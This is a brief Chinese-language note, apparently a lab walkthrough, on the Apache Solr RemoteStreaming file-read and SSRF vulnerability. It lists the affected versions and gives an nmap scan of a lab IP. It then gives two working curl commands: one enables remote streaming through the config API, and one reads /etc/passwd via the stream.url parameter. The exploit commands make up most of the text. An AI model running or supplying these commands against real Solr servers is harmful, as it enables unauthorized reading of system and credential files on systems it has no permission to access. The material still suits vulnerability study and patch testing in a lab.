Close

28 5 月, 2024

(Solr文件读取)

Apache Solr RemoteStreaming 文件读取与SSRF漏洞

影响范围:Apache Solr 5.0.0至5.5.5版本;Apache Solr 6.0.0至6.6.5版本;Apache Solr 7.0.0至7.7.3版本;Apache Solr 8.0.0至8.8.1版本

信息收集:nmap 192.168.85.130 -p 8983 -A

curl -i -s -k -X $’POST’ \ -H $’Content-Type: application/json’ –data-binary $'{\”set-property\”:{\”requestDispatcher.requestParsers.enableRemoteStreaming\”:true}}’     $’http://192.168.85.130:8983/solr/demo/config’

curl -i -s -k ‘http://192.168.85.130:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd